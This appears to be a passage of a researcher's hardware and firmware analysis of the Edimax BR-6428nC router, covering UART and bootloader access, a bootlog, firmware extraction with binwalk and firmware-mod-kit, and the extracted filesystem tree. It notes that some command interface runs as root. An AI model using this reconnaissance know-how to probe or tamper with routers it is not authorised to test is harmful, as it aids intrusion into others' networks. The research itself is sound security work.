pppoeloop.sh         mssid2.sh            wps.sh
wlan_scan            syslog.sh            brctl
reboot.sh            setup                flash
syn-flood.sh         noip2                auth
lanwanaccess.sh      connect.sh           cat
echo                 dhcpd.sh             setdip.sh
iwpriv               pptp.sh              wlanScan.sh
saveiq.sh            setpptp.sh           tc
rdisc                connect_test.sh      Radiusd.sh
portscan.sh          stcrout.sh           reload
chmod                iwcontrol            bridge.sh
hex_dec_convert      kill

/sbin:
reboot    halt      syslogd   ifconfig  chat
route     init      poweroff  logread   udhcpc
Note: /dev/root / squashfs is mounted ro, but /tmp -> /var and /dev are mounted rw as ramfs and can be used for logging or any other temporary storage.
Important: The commands are executed with root priviledges.

Physical Intervention

Edimax BR-6428nC: N300 Multi-Function Wi-Fi Router
REALTEK RTL8196E Soc[Datasheet]: Investigated PIN reference

SoC

The main processor, referred to as MCU here, is a REALTEK "RTL8196E" Soc and has a Thin Quad Flat Package (TQFP) with 128 leads on the side. Although this chip has a lead density of 24 leads/cm, it is still possible to hook up to them. This could also be used to intercept other information streams in and out of the MCU. Even if this in itself should not have a security risk in the actual use of the device! The MCU was only examined for the availability of an active UART.

UART: PCB Pin Assignment

UART

Eventhough the PCB has an UART interface, it is not possible by my knowledge to gain access to the live system. While booting, the input will be disabled once the kernel parameters (root=/dev/mtdblock1 console=0 single) are passed to the OS. It only allows to read the bootlog and access the bootloader. It may be possible to active the UART using code injection.

Bootloader

The RTL8196E's bootloader can be accessed by pressing ESC or the WPS button on boot. Entering "help" or any other command command results in a "Unknown command !" after any try.

Edimax BR-6428nC: N300 Multi-Function Wi-Fi Router
Booting...

********************************************************************************
*
* chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
* 0000000h 0c22016h 00000c2h 0000020h 0000016h 0000000h 0000016h 0400000h
* blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
* 0010000h 0000040h 0001000h 0000400h 0000100h 0000010h 000004eh MX25L3205D
* 
********************************************************************************

---RealTek(RTL8196E)at 2014.09.22-15:02+0800 v0.3 [16bit](380MHz)
---Dram16M_16Mx1_16bit, TRX Timing: [T:16 R:08]
P0phymode=01, embedded phy

Unknown command !
ls
Unknown command !
help
Unknown command !
HELP
?
Unknown command !
IPCONFIG
Unknown command !

Bootlog

Device in router-mode after a basic setup.

Edimax BR-6428nC: N300 Multi-Function Wi-Fi Router
Booting...

********************************************************************************
*
* chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
* 0000000h 0c22016h 00000c2h 0000020h 0000016h 0000000h 0000016h 0400000h
* blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
* 0010000h 0000040h 0001000h 0000400h 0000100h 0000010h 000004eh MX25L3205D
*
********************************************************************************

---RealTek(RTL8196E)at 2014.09.22-15:02+0800 v0.3 [16bit](380MHz)
---Dram16M_16Mx1_16bit, TRX Timing: [T:16 R:08]
decompressing kernel:
Uncompressing Linux... done, booting the kernel.
done decompressing kernel.
Realtek WLAN driver - version 1.6 (2013-02-21)
init started: BusyBox v1.11.1 (2015-09-24 13:24:39 CST)
starting pid 9, tty '': '-/bin/sh'


BusyBox v1.11.1 (2015-09-24 13:24:39 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/bin/init.sh: /tmp/mssid.txt: line 5: wlan0-va0: not found
kill: you need to specify whom to kill
Close Wan Interface!!
dhcp mtu >> 1500
Initialize WLAN interface
>> 2.4G adaptivity enable !!

DO 8192E IQK !!!!
Done 8192E IQK !!!!

[selsect txpower] Normal txpower
[txpower] Current Channel : 1
[txpower] Enable Power Table
[txpower] CE Power Table
[txpower] 11b H->L rate index:4
[txpower] 11g H->L rate index:10
[txpower] 11n20M H->L rate index:10
[txpower] 11n40M H->L rate index:8
[txpower] 40/20M
Setup BRIDGE interface
ifconfig: ioctl 0x8913 failed: No such device
ifconfig: ioctl 0x8913 failed: No such device
bridge br0 doesn't exist; can't delete it
Setup bridge...

DO 8192E IQK !!!!
Done 8192E IQK !!!!

Static DHCP Leases disable!
Setup WAN interface
kill: you need to specify whom to kill
Close Wan Interface!!
>> WAN_MODE is 0
device eth1 is not a slave of br0
device eth0 is already a member of a bridge; can't enslave it to bridge br0.
**********************************************************************
*                          Enable WSC_UPnP                           *
**********************************************************************
**********************************************************************
*                            Enable LLTD                             *
**********************************************************************
**********************************************************************
*                       Enable GPIO Interrupt                        *
**********************************************************************
udhcpc (v1.11.1) started
into eth1.deconfig
Sending select for 192.168.86.40...
Lease of 192.168.86.40 obtained, lease time 86400
killall: radiusd: no process killed
RADIUS server disable !!
######## eth1.bound ########
cat: can't open '/tmp/pktmask': No such file or directory
adding dns 192.168.86.1
route: ioctl 0x890c failed: No such process
route: ioctl 0x890c failed: No such process
deleting routers
route: ioctl 0x890c failed: No such process
Notice: caching turned off

WiFi Simple Config v2.11-wps2.0 (2012.06.18-11:32+0000).

**********************************************************************
*                       FREE Page,Dentries and Inodes Cache          *
**********************************************************************
IEEE 802.11f (IAPP) using interface br0 (v1.7)
MemFree:          2648 kB
Cached:           2204 kB
killall: crond: no process killed
Time server domain name=pool.ntp.org
Time server address=195.186.4.100
boa: server version Boa/0.94.14rc21
boa: server built Sep 24 2015 at 13:24:36.
boa: starting server pid=901, port 80
route: ioctl 0x890b failed: File exists
route: ioctl 0x890b failed: File exists

Firmware

Current Version

BR-6428nC: https://www.edimax.com/edimax/download/download/data/edimax/global/download/product/wireless_routers/wireless_routers_n300/br-6428nc/

Note: The currently (18. April 2020) the official firmware version is v1.16. But, the version v1.17 is also downloadable.
Despite the fact that v1.17 seems to be the older version, which was created in October 2014 and the versions v.1.15 in Juli 2015 and v1.16 in September 2015.

Known Versions

BR-6428nC:

Note: Search for other available firmware versions: wget https://www.edimax.com/edimax/mw/cufiles/files/download/Firmware/BR6428NC_v1.{0..50}.zip --max-redirect 0

Extraction

BR-6428nC v1.16
Warning: Using only binwalk or dd with unsqushfs was only partwise successfull. See the last approach using firmware-mod-kit for the best extraction option in this scenario.
Option 1: Basic binwalk usage.
Note: Resulting in an unstructured blob of files. Not all files extracted.
$ binwalk -Mre --dd=".*" BR6428NC_v1.16.bin

Scan Time:     2020-04-26 20:46:12
Target File:   ./Examination of Edimax devices/BR-6428nC/Firmware/BR6428NC_v1.16/BR6428NC_v1.16.bin
MD5 Checksum:  3c06df588aefc9d5d21a9e1e746bf1e2
Signatures:    404

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
325           0x145           LZMA compressed data, properties: 0x88, dictionary size: 336068608 bytes, uncompressed size: 29696 bytes
465           0x1D1           LZMA compressed data, properties: 0x88, dictionary size: 336068608 bytes, uncompressed size: 29696 bytes
509           0x1FD           LZMA compressed data, properties: 0x88, dictionary size: 1048576 bytes, uncompressed size: 65535 bytes
11280         0x2C10          LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 2486272 bytes
720896        0xB0000         Squashfs filesystem, big endian, version 2.0, size: 1659674 bytes, 426 inodes, blocksize: 65536 bytes, created: 2015-09-24 05:25:50

[... 7400 more lines of recursive extraction ...]

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
1611576       0x189738        Certificate in DER format (x509 v3), header length: 4, sequence length: 130
2026624       0x1EEC80        Linux kernel version 2.4.18
2034184       0x1F0A08        Unix path: /usr/lib/libc.so.1
Option 2: Manually extract and process squaschfs filesystem using dd then unsquahfs.
Note: Non-standard squashfs filesystem could not be extracted
$ binwalk BR6428NC_v1.16.bin

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
325           0x145           LZMA compressed data, properties: 0x88, dictionary size: 336068608 bytes, uncompressed size: 29696 bytes
465           0x1D1           LZMA compressed data, properties: 0x88, dictionary size: 336068608 bytes, uncompressed size: 29696 bytes
509           0x1FD           LZMA compressed data, properties: 0x88, dictionary size: 1048576 bytes, uncompressed size: 65535 bytes
11280         0x2C10          LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 2486272 bytes
720896        0xB0000         Squashfs filesystem, big endian, version 2.0, size: 1659674 bytes, 426 inodes, blocksize: 65536 bytes, created: 2015-09-24 05:25:50

$ dd if=BR6428NC_v1.16.bin skip=720896 bs=1 of=BR6428NC_v1.16.squashfs
1662978+0 records in
1662978+0 records out
1662978 bytes transferred in 6.229509 secs (266952 bytes/sec)

$ file BR6428NC_v1.16.squashfs
Squashfs filesystem, big endian, version 2.0, size: 1659674 bytes, 426 inodes, blocksize: 65536 bytes, created: 2015-09-24 05:25:50

$ unsquashfs BR6428NC_v1.16.squashfs 
Reading a different endian SQUASHFS filesystem on BR6428NC_v1.16.squashfs
gzip uncompress failed with error code -3
read_block: failed to read block @0x195226
read_fragment_table: failed to read fragment table block
File system corruption detected
FATAL ERROR:failed to read file system tables
Option 3: Best alternative using the firmware-mod-kit.
$ ./fimrware-extract BR6428NC_v1.16.bin

[Output ommitted]

$ tree ./fmk/
./fmk/
├── image_parts
│   ├── header.img
│   └── rootfs.img
├── logs
│   ├── binwalk.log
│   └── config.log
└── rootfs
    ├── bin
    │   ├── BSrestoreChan.sh
    │   ├── QoS.sh
    │   ├── Radiusd.sh
    │   ├── accessctl.sh
    │   ├── alg.sh
    │   ├── ash -> busybox
    │   ├── auth
    │   ├── axhttpd
    │   ├── brctl
    │   ├── bridge.sh
    │   ├── busybox
    │   ├── cat -> busybox
    │   ├── chmod -> busybox
    │   ├── cleanlog.sh
    │   ├── connect.sh
    │   ├── connect_test.sh
    │   ├── cp -> busybox
    │   ├── create_l2tp_conf.sh
    │   ├── date -> busybox
    │   ├── date.sh
    │   ├── ddns.sh
    │   ├── debugMsg.sh
    │   ├── del-route.sh
    │   ├── detect_Link.sh
    │   ├── dhcpc.sh
    │   ├── dhcpd.sh
    │   ├── disconnect.sh
    │   ├── dnrd
    │   ├── dnrd.sh
    │   ├── duallaccess.sh
    │   ├── echo -> busybox
    │   ├── edx_cloud
    │   ├── ez-ipupdate
    │   ├── ezqos.sh
    │   ├── firewall.sh
    │   ├── fixedip.sh
    │   ├── flash
    │   ├── fping
    │   ├── getstatus.sh
    │   ├── grep -> busybox
    │   ├── hex_dec_convert
    │   ├── http_proxy.sh
    │   ├── hwset.sh
    │   ├── iapp
    │   ├── igmpproxy
    │   ├── init.sh
    │   ├── init_ap.sh
    │   ├── interrupt.sh
    │   ├── intrusion.sh
    │   ├── ip -> busybox
    │   ├── ipcalc -> busybox
    │   ├── iptables
    │   ├── ipup.sh
    │   ├── iwcontrol
    │   ├── iwpriv
    │   ├── kill -> busybox
    │   ├── killapp.sh
    │   ├── l2tp.sh
    │   ├── l2tp_2.sh
    │   ├── l2tpd
    │   ├── lanwanaccess.sh
    │   ├── lld2d
    │   ├── ln -> busybox
    │   ├── ls -> busybox
    │   ├── mini_upnpd
    │   ├── miniigd
    │   ├── miniupnp.sh
    │   ├── mkdir -> busybox
    │   ├── mknod -> busybox
    │   ├── mount -> busybox
    │   ├── mssid.sh
    │   ├── mssid2.sh
    │   ├── multidmz.sh
    │   ├── nbnsd
    │   ├── nbtscan
    │   ├── noip2
    │   ├── parentalcontrol.sh
    │   ├── pidof -> busybox
    │   ├── ping -> busybox
    │   ├── pod.sh
    │   ├── portfw.sh
    │   ├── portscan.sh
    │   ├── pppd
    │   ├── pppoe
    │   ├── pppoe.sh
    │   ├── pppoeloop.sh
    │   ├── pptp
    │   ├── pptp.sh
    │   ├── pptpd.sh
    │   ├── ps -> busybox
    │   ├── radio_on_off.sh
    │   ├── rdisc
    │   ├── reboot.sh
    │   ├── reload
    │   ├── remote.sh
    │   ├── reset.sh
    │   ├── rftest.sh
    │   ├── rm -> busybox
    │   ├── run_iqv2.sh
    │   ├── saveiq.sh
    │   ├── savelog.sh
    │   ├── sch_reboot.sh
    │   ├── scriptlib.sh
    │   ├── scriptlib_util.sh
    │   ├── sdmzWanCheck.sh
    │   ├── seclog.sh
    │   ├── setdip.sh
    │   ├── setl2tp.sh
    │   ├── setpppoe.sh
    │   ├── setpptp.sh
    │   ├── setsip.sh
    │   ├── setssidmac.sh
    │   ├── setup
    │   ├── sh -> busybox
    │   ├── sleep -> busybox
    │   ├── sntp.sh
    │   ├── sntpclock
    │   ├── stcrout.sh
    │   ├── syn-flood.sh
    │   ├── syslog.sh
    │   ├── tc
    │   ├── touch -> busybox
    │   ├── triggerport.sh
    │   ├── txpower.sh
    │   ├── txpower_INDIA.sh
    │   ├── txpower_V3.sh
    │   ├── txpower_select.sh
    │   ├── upnp.sh
    │   ├── urlblocking.sh
    │   ├── urlname.sh
    │   ├── vlan.sh
    │   ├── vserver.sh
    │   ├── wan-status.sh
    │   ├── watchdog.sh
    │   ├── webs
    │   ├── wiz_dhcpc.sh
    │   ├── wlan.sh
    │   ├── wlan2band.sh
    │   ├── wlanScan.sh
    │   ├── wlan_scan
    │   ├── wlanapp.sh
    │   ├── wps.sh
    │   ├── wps_Led.sh
    │   ├── wps_daemon.sh
    │   ├── wpstool -> /bin/wps.sh
    │   └── wscd
    ├── dev
    │   ├── log -> /var/dev/log
    │   ├── pts
    │   ├── ptyp0 -> /var/dev/ptyp0
    │   ├── ptyp1 -> /var/dev/ptyp1
    │   └── ptyp2 -> /var/dev/ptyp2
    ├── etc
    │   ├── boa
    │   │   ├── boa.conf
    │   │   ├── boa.passwd
    │   │   └── mime.types
    │   ├── compiler_date
    │   ├── config.bin
    │   ├── dnrd
    │   │   └── master -> /etc/hosts
    │   ├── fstab
    │   ├── group
    │   ├── host.conf
    │   ├── hosts -> /var/hosts
    │   ├── icon.ico
    │   ├── init.d
    │   │   └── rcS
    │   ├── inittab
    │   ├── iproute2
    │   │   ├── rt_dsfield
    │   │   ├── rt_protos
    │   │   ├── rt_realms
    │   │   ├── rt_scopes
    │   │   └── rt_tables
    │   ├── l2tpd
    │   ├── linuxigd -> /var/linuxigd
    │   ├── passwd
    │   ├── ppp -> /var/ppp
    │   ├── ppp.ro
    │   │   ├── ip-down
    │   │   └── ip-up
    │   ├── profile
    │   ├── protocols
    │   ├── resolv.conf -> /var/resolv.conf
    │   ├── resolv1.conf -> /var/resolv1.conf
    │   ├── resolv2.conf -> /var/resolv2.conf
    │   ├── services
    │   ├── simplecfg -> /var/wps
    │   ├── simplecfgservice.xml
    │   ├── svn_info
    │   ├── tmp
    │   │   ├── picsdesc.skl
    │   │   └── picsdesc.xml
    │   ├── udhcpc
    │   │   ├── br0.bound
    │   │   ├── br0.bound.ga
    │   │   ├── br0.deconfig -> /var/udhcpc/br0.deconfig
    │   │   ├── br0.leasefail
    │   │   ├── br0.sh
    │   │   ├── eth0.bound
    │   │   ├── eth0.deconfig
    │   │   ├── eth0.sh
    │   │   ├── eth1.bound
    │   │   ├── eth1.deconfig -> /var/udhcpc/eth1.deconfig
    │   │   ├── eth1.leasefail
    │   │   ├── eth1.sh
    │   │   ├── resolv.conf -> /var/udhcpc/resolv.conf
    │   │   ├── wlan0-vxd.bound
    │   │   ├── wlan0-vxd.deconfig -> /var/udhcpc/wlan0-vxd.deconfig
    │   │   ├── wlan0-vxd.sh
    │   │   ├── wlan0.bound
    │   │   ├── wlan0.deconfig -> /var/udhcpc/wlan0.deconfig
    │   │   ├── wlan0.leasefail
    │   │   ├── wlan0.sh
    │   │   ├── wlan1.bound
    │   │   ├── wlan1.deconfig -> /var/udhcpc/wlan1.deconfig
    │   │   ├── wlan1.leasefail
    │   │   └── wlan1.sh
    │   ├── version
    │   └── wscd.conf
    ├── lib
    │   ├── ld-uClibc.so.0
    │   ├── libc.so.0
    │   ├── libcrypt.so.0
    │   ├── libdl.so.0
    │   ├── libgcc_s_4181.so.1
    │   ├── libm.so.0
    │   ├── libpthread.so.0
    │   ├── libresolv.so.0
    │   └── mini_upnp.so
    ├── linuxrc -> bin/busybox
    ├── proc
    ├── sbin
    │   ├── chat
    │   ├── halt -> ../bin/busybox
    │   ├── ifconfig -> ../bin/busybox
    │   ├── init -> ../bin/busybox
    │   ├── logread -> ../bin/busybox
    │   ├── poweroff -> ../bin/busybox
    │   ├── reboot -> ../bin/busybox
    │   ├── route -> ../bin/busybox
    │   ├── syslogd -> ../bin/busybox
    │   └── udhcpc -> ../bin/busybox
    ├── tmp -> /var
    ├── usr
    │   ├── bin
    │   │   ├── arping -> ../../bin/busybox
    │   │   ├── basename -> ../../bin/busybox
    │   │   ├── cut -> ../../bin/busybox
    │   │   ├── expr -> ../../bin/busybox
    │   │   ├── head -> ../../bin/busybox
    │   │   ├── killall -> ../../bin/busybox
    │   │   ├── tail -> ../../bin/busybox
    │   │   ├── top -> ../../bin/busybox
    │   │   ├── tr -> ../../bin/busybox
    │   │   └── wc -> ../../bin/busybox
    │   ├── lib
    │   ├── sbin
    │   │   ├── crond -> ../../bin/busybox
    │   │   ├── pppd -> /bin/pppd
    │   │   └── udhcpd -> ../../bin/busybox
    │   └── share
    ├── var
    │   ├── etc
    │   │   └── mtab
    │   ├── lib
    │   │   └── misc
    │   ├── lock
    │   ├── log
    │   │   └── messages
    │   ├── run
    │   │   └── utmp
    │   └── state
    │       └── dhcp
    │           └── dhcpd.leases
    └── web
        ├── FUNCTION_SCRIPT
        ├── aIndex.asp
        ├── aconnected.asp
        ├── addPC.asp
        ├── adhcp_fail.asp
        ├── admin_activeDhcpClient.asp
        ├── admin_backrestore.asp
        ├── admin_logs.asp
        ├── admin_logs2.asp
        ├── admin_password.asp
        ├── admin_remotmang.asp
        ├── admin_restart.asp
        ├── admin_statistics.asp
        ├── admin_timezone.asp
        ├── admin_upgrade.asp
        ├── adv_alg.asp
        ├── adv_dmz.asp
        ├── adv_dos.asp
        ├── adv_firewal.asp
        ├── adv_igmp.asp
        ├── adv_portforward.asp
        ├── adv_staticrout.asp
        ├── adv_upnp.asp
        ├── adv_virtserver.asp
        ├── adv_wireless.asp
        ├── advanced_management.asp
        ├── afail.asp
        ├── apppoe.asp
        ├── conclusion.asp
        ├── conn_test.asp
        ├── connect_redirect.asp
        ├── connectmsg.asp
        ├── detect.asp
        ├── file
        │   ├── allasp-n.var
        │   ├── autowan.var
        │   ├── javascript.js
        │   ├── jquery-1.7.1.min.js
        │   ├── multilanguage.var
        │   ├── p6.gif
        │   └── set.css
        ├── graphics
        │   ├── ap_mode.jpg
        │   ├── ap_setup.gif
        │   ├── back-a.gif
        │   ├── banner.png
        │   ├── bg.jpg
        │   ├── bg1.jpg
        │   ├── cancel.png
        │   ├── check.png
        │   ├── dot-1.png
        │   ├── dot-2.png
        │   ├── loading.gif
        │   ├── logo.gif
        │   ├── no_connect.jpg
        │   ├── repeater_mode.jpg
        │   ├── repeater_setup.gif
        │   ├── router_mode.jpg
        │   ├── router_setup.gif
        │   ├── step1.jpg
        │   ├── step2.jpg
        │   ├── step3.jpg
        │   ├── step4.jpg
        │   └── wifi_24G.png
        ├── guest_wireless_basic.asp
        ├── hwsetup.asp
        ├── index.asp
        ├── index1.asp
        ├── inter_ddns.asp
        ├── inter_wan.asp
        ├── lan.asp
        ├── lan_ap.asp
        ├── last.asp
        ├── left_list.asp
        ├── left_list_ap.asp
        ├── left_list_rep.asp
        ├── main.asp
        ├── mdhcp.asp
        ├── mfail.asp
        ├── ml2tp.asp
        ├── mp.asp
        ├── mpppoe.asp
        ├── mpptp.asp
        ├── mstart.asp
        ├── mstatic.asp
        ├── msuccess.asp
        ├── probe.asp
        ├── qos.asp
        ├── qosadd.asp
        ├── redirect.asp
        ├── replace.asp
        ├── security_block.asp
        ├── security_block1.asp
        ├── set.css
        ├── setup_3wizard.asp
        ├── setup_3wizard_1.asp
        ├── setup_3wizard_2.asp
        ├── setup_3wizard_3.asp
        ├── setup_wizard.asp
        ├── status.asp
        ├── status_noInternet.asp
        ├── wifi.asp
        ├── wireless_access.asp
        ├── wireless_basic.asp
        ├── wireless_schedule.asp
        ├── wireless_wps.asp
        ├── wisp_wlsurvey.asp
        ├── wiz_3in1.asp
        ├── wiz_apmode1.asp
        ├── wiz_ip.asp
        ├── wiz_repeatermode1.asp
        ├── wiz_repeatermode2.asp
        ├── wizard_security.asp
        ├── wlClient.asp
        ├── wlWDS3_key.asp
        ├── wlWDS4_key.asp
        ├── wlWDS5_key.asp
        └── wlsurvey.asp

GPL Source Code

The GPL Source code is available on the Edimax Product Download section.

BR-6428nC GPL v1.16
$ tree -L 3
. 
├── 20151006_RTL8196C_Edimax_Edimax_GPL.tar.gz
├── 20151006_RTL8196C_Edimax_Edimax_GPL_md5.txt
├── 20151006_RTL8196C_Edimax_Edimax_GPL_readme.txt
└── RTL8196C_Edimax
    ├── AP
    │   ├── DoApp.sh
    │   ├── Edimax_Cloud
    │   ├── RTL8196E_1200
    │   ├── axTLS
    │   ├── boa-0.94.14rc21
    │   ├── bridge-utils
    │   ├── busybox-1.11.1
    │   ├── clockspeed-0.62
    │   ├── dnrd-2.20.3_hijack
    │   ├── etc.rootfs
    │   ├── ez-ipupdate-3.0.10
    │   ├── fping-2.4b2_interface
    │   ├── hex_dec_convert
    │   ├── igmpproxy
    │   ├── iproute2-2.4.7
    │   ├── iptables-1.3.8
    │   ├── iputils
    │   ├── l2tpd
    │   ├── lltd
    │   ├── mkimg
    │   ├── nbtscan-1.5.1a
    │   ├── netbios
    │   ├── noip-2.1.9-1
    │   ├── ppp-2.4.2
    │   ├── pptp-1.31
    │   ├── rp-l2tp-0.4
    │   ├── rp-pppoe-3.5
    │   ├── script
    │   ├── var
    │   ├── wget-1.10
    │   ├── wireless_tools.25
    │   ├── wlan_scan
    │   └── xl2tpd-1.2.4
    ├── BUILD.sh
    ├── COMPILING-SCRIPT.sh
    ├── PREPARE.sh
    ├── RobertGPL1.sh
    ├── boards
    │   └── rtl8196c
    ├── boot-source
    │   ├── bootcode_rtl8196d
    │   ├── bootcode_rtl8196d_EdimaxBootUpgrade
    │   └── rtl8196c-bootcode-1.0a
    ├── cleanSvn.sh
    ├── define
    │   ├── PATH_RTL8196E_1200_SDK12L
    │   └── usb_support.conf
    ├── generateGpl1
    ├── image
    │   ├── DoImage.sh
    │   ├── Upgrade.sh
    │   ├── autoCks.c
    │   ├── boot-SPI-16M-16BIT-SDRAM-6228NSv2BootUpgrade
    │   ├── boot-SPI-16M-16BIT-SDRAM-6228NSv2BootUpgrade.bin
    │   ├── boot-SPI-16M-16BIT-SDRAM-6428NSv2BootUpgrade
    │   ├── boot-SPI-16M-16BIT-SDRAM-6428NSv2BootUpgrade.bin
    │   ├── mgbin
    │   ├── mkimage
    │   ├── swapHL
    │   └── swapHL.c
    ├── linux-2.4.18_1200_96E_SDK12L
    │   ├── COPYING
    │   ├── CREDITS
    │   ├── DoLinux.sh
    │   ├── Documentation
    │   ├── MAINTAINERS
    │   ├── Makefile
    │   ├── README
    │   ├── REPORTING-BUGS
    │   ├── Rules.make
    │   ├── arch
    │   ├── drivers
    │   ├── fs
    │   ├── include
    │   ├── init
    │   ├── ipc
    │   ├── kernel
    │   ├── lib
    │   ├── mk
    │   ├── mm
    │   ├── net
    │   ├── rtk_voip
    │   ├── rtkload
    │   └── scripts
    ├── porting_sdk.txt
    ├── set_app_defined.sh
    ├── set_compiler_condition.sh
    └── toolchain
        ├── clean-space
        ├── rtl8196c-toolchain-1.1.tar.gz
        └── tools

Vulnerability Reports

Used Hardware

References